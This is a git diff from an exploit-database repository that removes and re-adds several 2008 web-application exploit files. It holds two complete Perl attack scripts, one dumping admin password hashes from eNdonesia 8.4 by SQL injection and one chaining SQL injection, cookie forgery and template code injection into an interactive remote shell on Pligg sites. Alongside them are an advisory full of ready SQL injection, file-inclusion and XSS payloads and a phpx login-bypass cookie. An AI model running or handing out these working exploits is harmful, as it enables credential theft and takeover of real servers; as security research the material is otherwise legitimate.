-                       my ($username,$passwd) = ($1,$2);
-                       print " [target] $target \n";
-                       print " [loginx] $username:$passwd \n\n";
-                       exit(0);
-               }
-               else {
-                       die " [error] Fail to get username and password.\n\n";
-               }
-       }
-       else {
-               die " [error] Fail to inject $target \n\n";
-       }
-  }
-
-#/----------------------------------------------------------------\
-#|  NoGay kalo kita artikan sepintas berarti Tidak ada Gay        |
-#|  namun mari kita perhatikan secara seksama ...                 |
-#|  NoGay merupakan kependekan dari NoGe is Gay.                  |
-#|  Sungguh, penyembunyian sebuah karakter di balik makna kata.   |
-#\----------------------------------------------------------------/
-#Vendor Has been contacted and now working for it.
-
-# milw0rm.com [2008-07-30]
+#!/usr/bin/perl
+#/-----------------------------------------------\
+#|  /-----------------------------------------\  |
+#|  |  Remote SQL Exploit                     |  |
+#|  |  eNdonesia 8.4 Remote SQL Exploit       |  |
+#|  |  www.endonesia.org                      |  |
+#|  |  Calendar Module                        |  |
+#|  \-----------------------------------------/  |
+#|  /-----------------------------------------\  |
+#|  |  Presented By Jack                      |  |
+#|  |  MainHack Enterprise                    |  |
+#|  |  www.MainHack.com & irc.nob0dy.net      |  | 
+#|  |  #MainHack #nob0dy #BaliemHackerlink    |  |
+#|  |  Jack[at]MainHack[dot]com               |  |
+#|  \-----------------------------------------/  |
+#|  /-----------------------------------------\  |
+#|  |  Hello To: Indonesian h4x0r             |  |
+#|  |  yadoy666,n0c0py & okedeh               |  |
+#|  |  VOP Crew [Vaksin13,OoN_BoY,Paman]      |  |
+#|  |  NoGe,str0ke,H312Y,s3t4n,[S]hiro,frull  |  |
+#|  |  all MainHack BrotherHood               |  |
+#|  \-----------------------------------------/  |
+#\-----------------------------------------------/
+ 
+  use HTTP::Request;
+  use LWP::UserAgent;
+
+  $sql_vulnerable = "/mod.php?mod=calendar&op=list_events&loc_id=";
+  $sql_injection  = "-999/**/union+select/**/0x3a,0x3a,concat(aid,0x3a,pwd),0x3a,concat(name,0x3a,pwd)/**/from/**/authors/*where%20name%20pwd";
+
+  if(!@ARGV) { &help;exit(1);}
+
+  sub help(){
+       print "\n [?] eNdonesia 8.4 Remote SQL Exploit\n";
+       print " [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
+       print " [?] Use : perl $0 www.target.com\n";
+       print " [?] Dont use \"http://\"\n";                                                                                    
+       print " [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
+       print " [?] Baliem Hacker - VOP crew - MainHack BrotherHood \n\n";
+       print " [?] www.MainHack.com\n\n";
+  }
+
+  while (){
+      my $target    = $ARGV[0];
+       my $exploit   = "http://".$target.$sql_vulnerable.$sql_injection;
+       print "\n [-] Trying to inject $target ...\n\n";
+       my $request   = HTTP::Request->new(GET=>$exploit);
+       my $useragent = LWP::UserAgent->new();
+       $useragent->timeout(10);
+       my $response   = $useragent->request($request);
+       if ($response->is_success){
+               my $res = $response->content;
+               if ($res =~ m/\>([0-9,a-z]{2,13}):([0-9,a-f]{32})/g) {
+                       my ($username,$passwd) = ($1,$2);
+                       print " [target] $target \n";
+                       print " [loginx] $username:$passwd \n\n";
+                       exit(0);
+               }
+               else {
+                       die " [error] Fail to get username and password.\n\n";
+               }
+       }
+       else {
+               die " [error] Fail to inject $target \n\n";
+       }
+  }
+
+#/----------------------------------------------------------------\
+#|  NoGay kalo kita artikan sepintas berarti Tidak ada Gay        |
+#|  namun mari kita perhatikan secara seksama ...                 |
+#|  NoGay merupakan kependekan dari NoGe is Gay.                  |
+#|  Sungguh, penyembunyian sebuah karakter di balik makna kata.   |
+#\----------------------------------------------------------------/
+#Vendor Has been contacted and now working for it.
+
+# milw0rm.com [2008-07-30]
diff --git a/platforms/php/webapps/6172.pl b/platforms/php/webapps/6172.pl
index 81105ca32..0041d2d4f 100755
--- a/platforms/php/webapps/6172.pl
+++ b/platforms/php/webapps/6172.pl
@@ -1,204 +1,204 @@
-#!/usr/bin/perl -w
-use LWP::UserAgent;
-use MIME::Base64;
-use Digest::MD5 qw(md5_hex);
-use Getopt::Std; getopts('h:', \%args);
-
-print "#############################################\n";
-print "# Pligg <= 9.9 Remote Code Execution Exploit \n";
-print "#############################################\n";
-#dork = "Powered By Pligg" + "Legal: License and Source"
-
-# Proxy address
-$ENV{http_proxy} = 'http://127.0.0.1:8118/';
-
-my $http = LWP::UserAgent->new;
-   $http->agent('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1');
-   #$http->env_proxy(); # <-- uncomment for proxy
-   $http->cookie_jar({});
-
-my $host = $args{'h'} || usage(); # Host flag. Specify the Pligg root directory
-my $user = undef;
-my $pass = undef;
-my $file = undef;
-my $data = undef;
-my @auth = undef;
-
-# Details for the php code that is injected in to the template
-my $ereg = '(.*?)<\/cmdout>';
-my $cvar = 'cmd';
-my $cval = 'pwd;id';
-my $code = '';
-
-print "[*] Checking if a shell already exists ...\n";
-
-$data = $http->post(
-$host . '/index.php',
-[
-   $cvar  => $cval
-]); 
-
-if ( $data->content =~ /$ereg/si ) 
-{
-	print "[*] Found existing shell ...\n";
-}
-else
-{
-	print "[!] No existing shell found ...\n";
-
-	#############################################
-	# Gather user info via vote.php SQL Injection
-	#############################################
-
-	$data = $http->post(
-	$host . '/vote.php',
-	[
-	   'id'  => '-99 UNION SELECT 1,2,3,null,5,6,concat(user_login,char(58),user_pass),8,9 FROM pligg_users -- /*',
-	   'md5' => 'd41d8cd98f00b204e9800998ecf8427e' # <-- If you aren't logged in this always works
-	]); 
-
-	print "[*] Gathering user information ...\n";
-		
-	if ( $data->content =~ /(.*?):([a-f0-9]{1,64})/i )
-	{
-		$user = $1;
-		$pass = $2;
-
-		# Sets up the cookie to authenticate us
-		@auth = ('Cookie' => 'mnm_user=' . $user . '; mnm_key=' . encode_base64($user . ':' . crypt($user, 22) . ':' . md5_hex($pass)) . ';');
-
-		print "[+] Got user '$user' ...\n";
-
-	}
-	else
-	{
-		print "[!] Unable to get user info. Dumping output ...\n";
-		open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG);
-		exit;
-	}
-
-	#############################################
-	# Get the template path
-	#############################################
-
-	print "[*] Gathering template information ...\n";
-
-	$data = $http->get($host . '/admin_editor.php',@auth); 
-
-	if ( $data->content =~ />(.*?)<\/option>/i ) 
-	{
-		$file = $1;
-		# Quick and dirty fix
-		$file =~ s/admin_templates\/admin_access_denied.tpl/footer.tpl/;
-		print "[+] Got template file [$file]...\n";
-	}
-
-	#############################################
-	# Read the template contents
-	#############################################
-
-	$data = $http->post(
-	$host . '/admin_editor.php',
-	[
-	   'the_file'  => $file,
-	   'open' => 'Open'
-	]
-	,@auth); 
-
-	print "[*] Reading template data ...\n";
-
-	# Grab the template contents	
-	if ( $data->content =~ /(.*)<\/textarea>/is )
-	{
-		$temp = $2;
-		$temp =~ s/>/>/ig;
-		$temp =~ s/</pligg_debug.html');print ELOG $data->content;close(ELOG);
-		exit;
-	}
-
-	#############################################
-	# Update the Template Contents
-	#############################################
-
-
-	$data = $http->post(
-	$host . '/admin_editor.php',
-	[
-	   'the_file2'   => $file,
-	   'updatedfile' => $temp . $code,
-	   'save'        => 'Save+Changes'
-	]
-	,@auth); 
-
-	print "[*] Updating template data ...\n";
-
-	if ( $data->content =~ /File Saved/is )
-	{
-		print "[+] File saved!\n";
-	}
-	else
-	{
-		print "[!] Unable to update template data. Dumping output ...\n";
-		open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG);
-		exit;
-	}
-}
-
-#############################################
-# Setting up the php shell
-#############################################
-
-print "[*] Setting up shell ...\n";
-
-$data = $http->post(
-$host . '/index.php',
-[
-   $cvar  => $cval
-]); 
-
-if ( $data->content =~ /(.*?)<\/cmdout>/si ) 
-{
-	while ( 1 )
-	{
-		print "pligg:~#";
-		$exec = ;
-
-		$data = $http->post(
-		$host . '/index.php',
-		[
-		   $cvar  => $exec
-		]); 
-
-		if ( $data->content =~ /$ereg/si ) 
-		{
-			print $1 . "\n";
-		}
-		else
-		{
-			print "Unexpected Response!\n";
-		}
-	}
-}
-else
-{
-	print "[!] Unable to set up shell ...\n";
-	open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG);
-	exit;
-}
-
-sub usage
-{
-	print "pligg_exploit.pl -h http://path/to/pligg     \n";
-	exit;
-}
-
-# milw0rm.com [2008-07-30]
+#!/usr/bin/perl -w
+use LWP::UserAgent;
+use MIME::Base64;
+use Digest::MD5 qw(md5_hex);
+use Getopt::Std; getopts('h:', \%args);
+
+print "#############################################\n";
+print "# Pligg <= 9.9 Remote Code Execution Exploit \n";
+print "#############################################\n";
+#dork = "Powered By Pligg" + "Legal: License and Source"
+
+# Proxy address
+$ENV{http_proxy} = 'http://127.0.0.1:8118/';
+
+my $http = LWP::UserAgent->new;
+   $http->agent('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1');
+   #$http->env_proxy(); # <-- uncomment for proxy
+   $http->cookie_jar({});
+
+my $host = $args{'h'} || usage(); # Host flag. Specify the Pligg root directory
+my $user = undef;
+my $pass = undef;
+my $file = undef;
+my $data = undef;
+my @auth = undef;
+
+# Details for the php code that is injected in to the template
+my $ereg = '(.*?)<\/cmdout>';
+my $cvar = 'cmd';
+my $cval = 'pwd;id';
+my $code = '';
+
+print "[*] Checking if a shell already exists ...\n";
+
+$data = $http->post(
+$host . '/index.php',
+[
+   $cvar  => $cval
+]); 
+
+if ( $data->content =~ /$ereg/si ) 
+{
+	print "[*] Found existing shell ...\n";
+}
+else
+{
+	print "[!] No existing shell found ...\n";
+
+	#############################################
+	# Gather user info via vote.php SQL Injection
+	#############################################
+
+	$data = $http->post(
+	$host . '/vote.php',
+	[
+	   'id'  => '-99 UNION SELECT 1,2,3,null,5,6,concat(user_login,char(58),user_pass),8,9 FROM pligg_users -- /*',
+	   'md5' => 'd41d8cd98f00b204e9800998ecf8427e' # <-- If you aren't logged in this always works
+	]); 
+
+	print "[*] Gathering user information ...\n";
+		
+	if ( $data->content =~ /(.*?):([a-f0-9]{1,64})/i )
+	{
+		$user = $1;
+		$pass = $2;
+
+		# Sets up the cookie to authenticate us
+		@auth = ('Cookie' => 'mnm_user=' . $user . '; mnm_key=' . encode_base64($user . ':' . crypt($user, 22) . ':' . md5_hex($pass)) . ';');
+
+		print "[+] Got user '$user' ...\n";
+
+	}
+	else
+	{
+		print "[!] Unable to get user info. Dumping output ...\n";
+		open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG);
+		exit;
+	}
+
+	#############################################
+	# Get the template path
+	#############################################
+
+	print "[*] Gathering template information ...\n";
+
+	$data = $http->get($host . '/admin_editor.php',@auth); 
+
+	if ( $data->content =~ />(.*?)<\/option>/i ) 
+	{
+		$file = $1;
+		# Quick and dirty fix
+		$file =~ s/admin_templates\/admin_access_denied.tpl/footer.tpl/;
+		print "[+] Got template file [$file]...\n";
+	}
+
+	#############################################
+	# Read the template contents
+	#############################################
+
+	$data = $http->post(
+	$host . '/admin_editor.php',
+	[
+	   'the_file'  => $file,
+	   'open' => 'Open'
+	]
+	,@auth); 
+
+	print "[*] Reading template data ...\n";
+
+	# Grab the template contents	
+	if ( $data->content =~ /(.*)<\/textarea>/is )
+	{
+		$temp = $2;
+		$temp =~ s/>/>/ig;
+		$temp =~ s/</pligg_debug.html');print ELOG $data->content;close(ELOG);
+		exit;
+	}
+
+	#############################################
+	# Update the Template Contents
+	#############################################
+
+
+	$data = $http->post(
+	$host . '/admin_editor.php',
+	[
+	   'the_file2'   => $file,
+	   'updatedfile' => $temp . $code,
+	   'save'        => 'Save+Changes'
+	]
+	,@auth); 
+
+	print "[*] Updating template data ...\n";
+
+	if ( $data->content =~ /File Saved/is )
+	{
+		print "[+] File saved!\n";
+	}
+	else
+	{
+		print "[!] Unable to update template data. Dumping output ...\n";
+		open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG);
+		exit;
+	}
+}
+
+#############################################
+# Setting up the php shell
+#############################################
+
+print "[*] Setting up shell ...\n";
+
+$data = $http->post(
+$host . '/index.php',
+[
+   $cvar  => $cval
+]); 
+
+if ( $data->content =~ /(.*?)<\/cmdout>/si ) 
+{
+	while ( 1 )
+	{
+		print "pligg:~#";
+		$exec = ;
+
+		$data = $http->post(
+		$host . '/index.php',
+		[
+		   $cvar  => $exec
+		]); 
+
+		if ( $data->content =~ /$ereg/si ) 
+		{
+			print $1 . "\n";
+		}
+		else
+		{
+			print "Unexpected Response!\n";
+		}
+	}
+}
+else
+{
+	print "[!] Unable to set up shell ...\n";
+	open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG);
+	exit;
+}
+
+sub usage
+{
+	print "pligg_exploit.pl -h http://path/to/pligg     \n";
+	exit;
+}
+
+# milw0rm.com [2008-07-30]
diff --git a/platforms/php/webapps/6173.txt b/platforms/php/webapps/6173.txt
index 25d1fa05a..5f7111f88 100755
--- a/platforms/php/webapps/6173.txt
+++ b/platforms/php/webapps/6173.txt
@@ -1,186 +1,186 @@
-##########################################################
-# GulfTech Security Research                July 30, 2008
-##########################################################
-# Vendor : Pligg LLC
-# URL : http://www.pligg.com/
-# Version : Pligg <= 9.9
-# Risk : Multiple Vulnerabilities
-##########################################################
-
-
-Description:
-Pligg is a popular open source, full featured, content management
-system written in php. There are a number of vulnerabilities
-within Pligg that allow for remote file enumeration, file inclusion,
-cross site scripting, and sql injection. When combined these issues
-allow for remote code execution on the affected installation
-via arbitrary php code placed within template files once admin
-credentials are gained via SQL Injection.
-
-
-
-Cross Site Scripting:
-There are Cross Site Scripting issues in Pligg that allow for
-theft of client side credentials such as cookies. An example
-can be found in user.php. If the "view" parameter is set to
-"search" then the "keyword" parameter can be influenced. This
-is a result of un sanitized GPC variables being issued directly
-to smarty via the assign function.
-
-/user.php?view=search&keyword=
-
-The above example link would display the end users cookie to
-them. Of course this can also be used to steal the cookie data
-as mentioned earlier in this advisory.
-
-
-
-Arbitrary File Access:
-A number of file access issues exist in Pligg. They range from
-the not so severe (such as arbitrary file enumeration) to the
-much more severe (arbitrary file inclusion). In regards to the
-arbitrary file enumeration a good example of it can be found in
-trackback.php @ line 76
-
-$contents=@file_get_contents($tb_url);
-if(!$contents)
-trackback_response(1, $main_smarty->get_config_vars('PLIGG_Visual_Trackback_BadURL'));
-
-The $tb_url variable gets it's value directly from a post variable
-as seen @ line 36, so, we can see how this can be easily used to
-enumerate the existence of files on the web server both inside and
-outside of the web accessible directories. If the file exists we will
-get the "PLIGG_Visual_Trackback_BadURL" error. In addition to this
-issue, an attacker may also include arbitrary files via a malformed
-template request. Both template and language data within Pligg are
-accepted via cookie input and are used in file handling operations
-with no sanitation. The vulnerable code in question can be found in
-config.php @ lines 65-68.
-
-/settemplate.php?template=../LICENSE.txt%00
-
-An easy way to see this issue in action is to set the malformed
-"template" value via Pligg's settemplate.php script as seen above.
-The above example will successfully include the LICENSE.txt file
-that ships with the application by default.
-
-
-
-SQL Injection:
-There are a substantial number of SQL Injection issues within Pligg
-that allow for an attacker to read any data from the underlying
-database including user credentials. The first file we are going to
-look at is vote.php
-
-$link = new Link;
-$link->id=$_POST['id'];
-$link->read_basic();
-
-The above code can be found @ lines 19-21 and shows Pligg setting the
-internal class variable "id" with data from the $_POST super global.
-Now let's have a look at the read_basic() function within the Link
-class to see what exactly is being done with "id"
-
-
-// check to see if the link is cached
-// if it is, use it
-// if not, get from mysql and save to cache
-
-if (isset($cached_links[$id]) && $usecache == TRUE) {
-    $link = $cached_links[$id];
-} else {
-    $link = $db->get_row("SELECT " . table_links . ".* FROM " .
-    table_links . " WHERE link_id = $id");
-    $cached_links[$id] = $link;
-}
-
-
-As you can see in the above code taken from /libs/link.php @ lines
-200-209 the "id" variable is never sanitized before being used in a
-query. The result is a highly exploitable SQL Injection vulnerability.
-
-md5=d41d8cd98f00b204e9800998ecf8427e&id=-99 UNION SELECT 1,2,3,null,5,
-6,concat(user_login,char(58),user_pass),8,9 FROM pligg_users -- /*
-
-By sending a post request to vote.php with the above data an attacker
-can successfully expose user credentials. Still, there are more SQL
-Injection issues in Pligg, and next we will have a look at trackback.php
-
-$trackres = new Trackback;
-$trackres->link=$tb_id;
-$trackres->type='in';
-$trackres->url = $tb_url;
-$dupe = $trackres->read();
-
-The above code comes from trackback.php @ lines 68-72, and like the
-issue we previously discussed in regards to vote.php also sends
-unsanitized gpc data to an internal class variable (in this case
-$trackres->link) where it is used in an SQL Query without ever being
-sanitized.
-
-/trackback.php?id=007 UNION SELECT 1,2,3,4,5,6,7,8,9,10 FROM pligg_users
-WHERE user_id=1 AND MID(user_pass,1,1)=concat(char(97)) -- /*
-
-A request like the one above made with the post method to trackback.php
-and having the post contents of "url=1&title=1&blog_name=1" can be used
-to successfully enumerate database contents. In the example above Pligg
-would return a "We already have a ping from that URL for this post."
-error if the first character of the first user's password is "a". Next
-let's have a look at submit.php @ lines 320-321 and you will see another
-SQL Injection issue very similar to these first two that I have discussed.
-Another SQL Injection issue can be found in story.php @ lines 45 where
-the "requestTitle" variable is used in a query with no sanitation.
-Another SQL Injection issue can be found in recommend.php @ lines 19-25.
-The SQL Injection issues in recommend.php are possible through both the
-"requestID" and the "requestTitle" variables. Another SQL Injection issue
-can be found in cloud.php @ lines 35-36 via the categoryID parameter.
-Another SQL Injection issue can be found within out.php and is not much
-different from the previously discussed SQL Injection issues in Pligg.
-
-/out.php?title=-99%27 UNION SELECT 1 FROM pligg_users WHERE user_id=1 AND
-MID(user_pass,1,1)=concat(char(97))/*
-
-The above url will allow an attacker to enumerate database data as
-discussed earlier, and eventually gain admin credentials. Due to the large
-number of SQL Injection issues in Pligg I will identify the remaining
-issues with some simple examples of exploitation.
-
----[ login.php ]------------------------------------------------
-/* Post Request */
-processlogin=3&username=-99' UNION SELECT 1,2,3,4,5,6,null,8,9,10,11,12,13,14,
-15,16,17,18,19,20,21,22,23,24,25,26 FROM pligg_users WHERE user_id=1/*
-
-/* Get Request */
-/login.php?processlogin=4&username=-99' UNION SELECT 1 FROM pligg_users
-WHERE user_id=1/*&confirmationcode=1
-
----[ cvote.php ]------------------------------------------------
-/* Post Request */
-id=-99 UNION SELECT 1,null,3,4,5,6,7,8,9 FROM pligg_users/*
-&md5=d41d8cd98f00b204e9800998ecf8427e
-
----[ edit.php ]-------------------------------------------------
-/* Get Request */
-/edit.php?id=1&commentid=-99 UNION SELECT 1 FROM pligg_users WHERE
-user_id=1 AND MID(user_pass,1,1)=concat(char(49))/*
-
-
-
-Solution:
-The Pligg developers are aware of the issues mentioned in this advisory
-and an updated version of Pligg should be available from their website.
-All users are encouraged to upgrade their Pligg installations as soon
-as possible.
-
-
-
-Credits:
-James Bercegay of the GulfTech Security Research Team
-
-
-
-Related Info:
-The original advisory can be found at the following location
-http://www.gulftech.org/?node=research&article_id=00120-07312008
-
-# milw0rm.com [2008-07-30]
+##########################################################
+# GulfTech Security Research                July 30, 2008
+##########################################################
+# Vendor : Pligg LLC
+# URL : http://www.pligg.com/
+# Version : Pligg <= 9.9
+# Risk : Multiple Vulnerabilities
+##########################################################
+
+
+Description:
+Pligg is a popular open source, full featured, content management
+system written in php. There are a number of vulnerabilities
+within Pligg that allow for remote file enumeration, file inclusion,
+cross site scripting, and sql injection. When combined these issues
+allow for remote code execution on the affected installation
+via arbitrary php code placed within template files once admin
+credentials are gained via SQL Injection.
+
+
+
+Cross Site Scripting:
+There are Cross Site Scripting issues in Pligg that allow for
+theft of client side credentials such as cookies. An example
+can be found in user.php. If the "view" parameter is set to
+"search" then the "keyword" parameter can be influenced. This
+is a result of un sanitized GPC variables being issued directly
+to smarty via the assign function.
+
+/user.php?view=search&keyword=
+
+The above example link would display the end users cookie to
+them. Of course this can also be used to steal the cookie data
+as mentioned earlier in this advisory.
+
+
+
+Arbitrary File Access:
+A number of file access issues exist in Pligg. They range from
+the not so severe (such as arbitrary file enumeration) to the
+much more severe (arbitrary file inclusion). In regards to the
+arbitrary file enumeration a good example of it can be found in
+trackback.php @ line 76
+
+$contents=@file_get_contents($tb_url);
+if(!$contents)
+trackback_response(1, $main_smarty->get_config_vars('PLIGG_Visual_Trackback_BadURL'));
+
+The $tb_url variable gets it's value directly from a post variable
+as seen @ line 36, so, we can see how this can be easily used to
+enumerate the existence of files on the web server both inside and
+outside of the web accessible directories. If the file exists we will
+get the "PLIGG_Visual_Trackback_BadURL" error. In addition to this
+issue, an attacker may also include arbitrary files via a malformed
+template request. Both template and language data within Pligg are
+accepted via cookie input and are used in file handling operations
+with no sanitation. The vulnerable code in question can be found in
+config.php @ lines 65-68.
+
+/settemplate.php?template=../LICENSE.txt%00
+
+An easy way to see this issue in action is to set the malformed
+"template" value via Pligg's settemplate.php script as seen above.
+The above example will successfully include the LICENSE.txt file
+that ships with the application by default.
+
+
+
+SQL Injection:
+There are a substantial number of SQL Injection issues within Pligg
+that allow for an attacker to read any data from the underlying
+database including user credentials. The first file we are going to
+look at is vote.php
+
+$link = new Link;
+$link->id=$_POST['id'];
+$link->read_basic();
+
+The above code can be found @ lines 19-21 and shows Pligg setting the
+internal class variable "id" with data from the $_POST super global.
+Now let's have a look at the read_basic() function within the Link
+class to see what exactly is being done with "id"
+
+
+// check to see if the link is cached
+// if it is, use it
+// if not, get from mysql and save to cache
+
+if (isset($cached_links[$id]) && $usecache == TRUE) {
+    $link = $cached_links[$id];
+} else {
+    $link = $db->get_row("SELECT " . table_links . ".* FROM " .
+    table_links . " WHERE link_id = $id");
+    $cached_links[$id] = $link;
+}
+
+
+As you can see in the above code taken from /libs/link.php @ lines
+200-209 the "id" variable is never sanitized before being used in a
+query. The result is a highly exploitable SQL Injection vulnerability.
+
+md5=d41d8cd98f00b204e9800998ecf8427e&id=-99 UNION SELECT 1,2,3,null,5,
+6,concat(user_login,char(58),user_pass),8,9 FROM pligg_users -- /*
+
+By sending a post request to vote.php with the above data an attacker
+can successfully expose user credentials. Still, there are more SQL
+Injection issues in Pligg, and next we will have a look at trackback.php
+
+$trackres = new Trackback;
+$trackres->link=$tb_id;
+$trackres->type='in';
+$trackres->url = $tb_url;
+$dupe = $trackres->read();
+
+The above code comes from trackback.php @ lines 68-72, and like the
+issue we previously discussed in regards to vote.php also sends
+unsanitized gpc data to an internal class variable (in this case
+$trackres->link) where it is used in an SQL Query without ever being
+sanitized.
+
+/trackback.php?id=007 UNION SELECT 1,2,3,4,5,6,7,8,9,10 FROM pligg_users
+WHERE user_id=1 AND MID(user_pass,1,1)=concat(char(97)) -- /*
+
+A request like the one above made with the post method to trackback.php
+and having the post contents of "url=1&title=1&blog_name=1" can be used
+to successfully enumerate database contents. In the example above Pligg
+would return a "We already have a ping from that URL for this post."
+error if the first character of the first user's password is "a". Next
+let's have a look at submit.php @ lines 320-321 and you will see another
+SQL Injection issue very similar to these first two that I have discussed.
+Another SQL Injection issue can be found in story.php @ lines 45 where
+the "requestTitle" variable is used in a query with no sanitation.
+Another SQL Injection issue can be found in recommend.php @ lines 19-25.
+The SQL Injection issues in recommend.php are possible through both the
+"requestID" and the "requestTitle" variables. Another SQL Injection issue
+can be found in cloud.php @ lines 35-36 via the categoryID parameter.
+Another SQL Injection issue can be found within out.php and is not much
+different from the previously discussed SQL Injection issues in Pligg.
+
+/out.php?title=-99%27 UNION SELECT 1 FROM pligg_users WHERE user_id=1 AND
+MID(user_pass,1,1)=concat(char(97))/*
+
+The above url will allow an attacker to enumerate database data as
+discussed earlier, and eventually gain admin credentials. Due to the large
+number of SQL Injection issues in Pligg I will identify the remaining
+issues with some simple examples of exploitation.
+
+---[ login.php ]------------------------------------------------
+/* Post Request */
+processlogin=3&username=-99' UNION SELECT 1,2,3,4,5,6,null,8,9,10,11,12,13,14,
+15,16,17,18,19,20,21,22,23,24,25,26 FROM pligg_users WHERE user_id=1/*
+
+/* Get Request */
+/login.php?processlogin=4&username=-99' UNION SELECT 1 FROM pligg_users
+WHERE user_id=1/*&confirmationcode=1
+
+---[ cvote.php ]------------------------------------------------
+/* Post Request */
+id=-99 UNION SELECT 1,null,3,4,5,6,7,8,9 FROM pligg_users/*
+&md5=d41d8cd98f00b204e9800998ecf8427e
+
+---[ edit.php ]-------------------------------------------------
+/* Get Request */
+/edit.php?id=1&commentid=-99 UNION SELECT 1 FROM pligg_users WHERE
+user_id=1 AND MID(user_pass,1,1)=concat(char(49))/*
+
+
+
+Solution:
+The Pligg developers are aware of the issues mentioned in this advisory
+and an updated version of Pligg should be available from their website.
+All users are encouraged to upgrade their Pligg installations as soon
+as possible.
+
+
+
+Credits:
+James Bercegay of the GulfTech Security Research Team
+
+
+
+Related Info:
+The original advisory can be found at the following location
+http://www.gulftech.org/?node=research&article_id=00120-07312008
+
+# milw0rm.com [2008-07-30]
diff --git a/platforms/php/webapps/6176.txt b/platforms/php/webapps/6176.txt
index fdc4c2665..6826beaab 100755
--- a/platforms/php/webapps/6176.txt
+++ b/platforms/php/webapps/6176.txt
@@ -1,106 +1,106 @@
-=======================================================================
-
-                               = gnix =
-
-                       gnixmail at gmail dot com
-                        http://gnix.netsons.org
-         
-
-Application:  phpx
-              http://www.phpx.org/project.php (stable version)
-Versions:     3.5.16
-Platforms:    All
-Bug:          Cookie poisoning / Login bypass
-Date:         31 July 2008
- 
-
-
-=======================================================================
-
-  1. Intro
-  2. Cookie poisoning and login bypass
-
-
-
-=======================================================================
-
-  1. Intro
-  ========
-  
-PHPX is a web portal system, blog,Content Management System (CMS), forums,
-and more. All files are currently hosted at http://www.phpx.org/project.php
-
-
-
-=======================================================================
-
-  2. Cookie poisoning and login bypass
-  ====================================
-
-Every file in phpx-3.5.16/ directory have two lines of code: one for
-include includes/functions.inc.php, and another to create a website object. 
-website's constructor will call checkCookie.
-
-
-  Source code (includes/functions.inc.php)
-  ---------------------------------------------------------------------
-  class website {
-    ...
-
-    function website(){
-      ...
-      
-      $this->checkCookie();
-  ---------------------------------------------------------------------
-
-
-The function checkCookie set the user_id if PXL cookie is set and the 
-query return an user_id, and an username.
-
-
-  Vulnerable code (includes/functions.inc.php lines 75 to 89) 
-  ---------------------------------------------------------------------
-  function checkCookie(){
-
-    if ($_COOKIE[PXL]){
-      list($user_id, $username) = $this->core->db->fetch("select user_id, username from users where sess = '$_COOKIE[PXL]'");
-      if (!$user_id){
-        setcookie("PXL", '', time() - 60, '', '', $this->core->secure);
-        $head = "Location: http://" . $_SERVER["HTTP_HOST"] .  $_SERVER["REQUEST_URI"];
-        header($head);
-      }
-      else {
-        if (strtolower($username) == "xnuiem"){ $this->debug = 1; }
-          $this->user_id = $user_id;
-      }
-    }
-  }
-  ---------------------------------------------------------------------
-
-
-This user_id is then used in the website constructor for set the user_id
-of the core class. 
-
-
-  Source code (includes/functions.inc.php line 32)
-  ---------------------------------------------------------------------
-  $this->core->user_id = $this->user_id;
-  ---------------------------------------------------------------------
-
-
-Now if you want to get the admin privileges and by pass the login, you
-have to create a cookie like this below:
- 
-
-  ---------------------------------------------------------------------
-  PXL=a' OR username='admin
-  ---------------------------------------------------------------------
-
-  
-To do that you can use 'Modify Headers'.
-
-
-
-=======================================================================
-
-# milw0rm.com [2008-07-31]
+=======================================================================
+
+                               = gnix =
+
+                       gnixmail at gmail dot com
+                        http://gnix.netsons.org
+         
+
+Application:  phpx
+              http://www.phpx.org/project.php (stable version)
+Versions:     3.5.16
+Platforms:    All
+Bug:          Cookie poisoning / Login bypass
+Date:         31 July 2008
+ 
+
+
+=======================================================================
+
+  1. Intro
+  2. Cookie poisoning and login bypass
+
+
+
+=======================================================================
+
+  1. Intro
+  ========
+  
+PHPX is a web portal system, blog,Content Management System (CMS), forums,
+and more. All files are currently hosted at http://www.phpx.org/project.php
+
+
+
+=======================================================================
+
+  2. Cookie poisoning and login bypass
+  ====================================
+
+Every file in phpx-3.5.16/ directory have two lines of code: one for
+include includes/functions.inc.php, and another to create a website object. 
+website's constructor will call checkCookie.
+
+
+  Source code (includes/functions.inc.php)
+  ---------------------------------------------------------------------
+  class website {
+    ...
+
+    function website(){
+      ...
+      
+      $this->checkCookie();
+  ---------------------------------------------------------------------
+
+
+The function checkCookie set the user_id if PXL cookie is set and the 
+query return an user_id, and an username.
+
+
+  Vulnerable code (includes/functions.inc.php lines 75 to 89) 
+  ---------------------------------------------------------------------
+  function checkCookie(){
+
+    if ($_COOKIE[PXL]){
+      list($user_id, $username) = $this->core->db->fetch("select user_id, username from users where sess = '$_COOKIE[PXL]'");
+      if (!$user_id){
+        setcookie("PXL", '', time() - 60, '', '', $this->core->secure);
+        $head = "Location: http://" . $_SERVER["HTTP_HOST"] .  $_SERVER["REQUEST_URI"];
+        header($head);
+      }
+      else {
+        if (strtolower($username) == "xnuiem"){ $this->debug = 1; }
+          $this->user_id = $user_id;
+      }
+    }
+  }
+  ---------------------------------------------------------------------
+
+
+This user_id is then used in the website constructor for set the user_id
+of the core class. 
+
+
+  Source code (includes/functions.inc.php line 32)
+  ---------------------------------------------------------------------
+  $this->core->user_id = $this->user_id;
+  ---------------------------------------------------------------------
+
+
+Now if you want to get the admin privileges and by pass the login, you
+have to create a cookie like this below:
+ 
+
+  ---------------------------------------------------------------------
+  PXL=a' OR username='admin
+  ---------------------------------------------------------------------
+
+  
+To do that you can use 'Modify Headers'.
+
+
+
+=======================================================================
+
+# milw0rm.com [2008-07-31]
diff --git a/platforms/php/webapps/6177.php b/platforms/php/webapps/6177.php
index e104b0544..4f5ceb20b 100755
--- a/platforms/php/webapps/6177.php
+++ b/platforms/php/webapps/6177.php
@@ -1,142 +1,142 @@
-_db->fetchRow(0, $sql);
-[...]
-}
-[...]
-if(isset($_COOKIE[__SYM_COOKIE__])){
